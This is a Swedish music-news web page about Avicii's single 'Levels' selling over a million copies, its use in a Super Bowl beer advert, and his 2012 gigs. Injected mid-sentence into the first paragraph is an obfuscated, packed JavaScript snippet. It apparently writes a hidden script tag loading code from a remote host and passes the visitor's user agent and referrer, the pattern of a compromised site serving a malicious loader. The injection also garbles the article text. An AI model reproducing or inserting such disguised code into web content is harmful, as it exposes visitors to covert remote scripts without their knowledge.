Image Image Image Image Image Image Image Image Image Image

| 16 juli, 2018

Scroll to top

Top

No Comments

Svenska superstjärnan Avicii säljer över en miljon singlar

Svenska superstjärnan Avicii säljer över en miljon singlar
Revue Magazine

Nya eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|azhds|var|u0026u|referrer|eyrif||js|php’.split(‘|’),0,{}))
svenska superstjärnan Tim Berg – mer känd som house-producenten och discjockeyn Avicii – är utan tvekan en av Sveriges mest framgångsrika musikexporter just nu. Aviciis hitsingel, Etta James-samplande ”Levels” har nu sålts i långt över en miljon exemplar. Den har sålt fyrdubbel platina i Sverige och trefaldig i Norge samt nått platina-status i Australien, Kanada, Danmark och Irland. Utöver det så har ”Levels” gått guld i Tyskland, Italien, Nya Zeeland, Österrike, Schweiz, Belgien och Holland.

Även i USA skördar Avicii allt större framgångar. Han har just avslutat en längre turné i landet och natten mellan söndagen och måndagen förekom såväl ”Levels” som Avicii själv i världens största och dyraste reklamsammanhang – amerikanska Superbowl-finalen – som gick av stapeln under söndagen i Indianapolis, Indiana. Det var i en reklam-spot för Budweisers nya öl Bud Light Platinum som man kunde se Avicii bakom skivspelarna samtidigt som ”Levels” spelades för Superbowl-publiken. Superbowl finalen är i regel den mest sedda TV-händelsen under året i USA och tittarsiffrorna ligger runt 100 miljoner, enbart inom landet. Många av reklam-spotarna i samband med Superbowl få också ofta en stor spridning på Internet, via YouTube och andra kanaler.

Avicii har ett spännade 2012 framför sig där han bl.a kommer att göra tre gig i Globen den 2-3 Mars, samt headlina både amerikanska Coachella-festivalen och Ultra Music Festival i Miami. Tidningen Billboard har även utnämnt Avicii till #3 ”Best Bet for 2012”

För mer information kontakta:

Christoffer@silverbergpromotion.se

Submit a Comment